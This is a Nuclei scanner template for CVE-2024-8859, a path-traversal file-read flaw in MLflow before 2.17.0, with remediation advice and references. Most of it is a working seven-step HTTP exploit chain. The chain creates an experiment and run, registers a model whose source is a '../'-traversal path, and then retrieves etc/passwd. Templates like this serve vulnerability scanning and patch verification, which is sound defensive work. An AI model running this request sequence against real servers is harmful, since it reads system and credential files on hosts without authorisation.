id: CVE-2024-8859

info:
  name: Mlflow < 2.17.0 - Local File Inclusion
  author: gy741
  severity: critical
  description: |
    Mlflow before 2.17.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.17.0 or later to mitigate the vulnerability.
  reference:
    - https://huntr.com/bounties/2259b88b-a0c6-4c7c-b434-6aacf6056dcb
    - https://github.com/mlflow/mlflow/pull/13161
    - https://nvd.nist.gov/vuln/detail/CVE-2024-8859
  classification:
    epss-score: 0.25693
    epss-percentile: 0.96341
  metadata:
    max-request: 7
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
  tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "artifact_location": "dbfs:/"}

      - |
        POST /api/2.0/mlflow/runs/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/upload-artifact?run_uuid={{RUN_ID}}&path=a?/a HTTP/1.1
        Host: {{Hostname}}

        whatever

      - |
        POST /ajax-api/2.0/mlflow/experiments/delete HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"experiment_id": "{{EXPERIMENT_ID}}"}

      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}"}

      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name": "{{randstr}}", "source": "dbfs:/{{RUN_ID}}/artifacts/a%3f/../../../../../../../../../../../../"}

      - |
        GET /model-versions/get-artifact?name={{randstr}}&version=1&path=etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body_1
        name: EXPERIMENT_ID
        group: 1
        json:
          - '.experiment_id'
        internal: true

      - type: json
        part: body_2
        name: RUN_ID
        group: 1
        json:
          - '.run.info.run_id'
        internal: true
# digest: 4a0a00473045022100d1fb86d44600dc4c51b53b9e195098d29943ae502229a98c1d5c6b3be16949a502201db238b5556029860c350f70647f0f53814b176ce98bde484fc7fa0a7d4a7b14:922c64590222798bb761d5b6d8e72950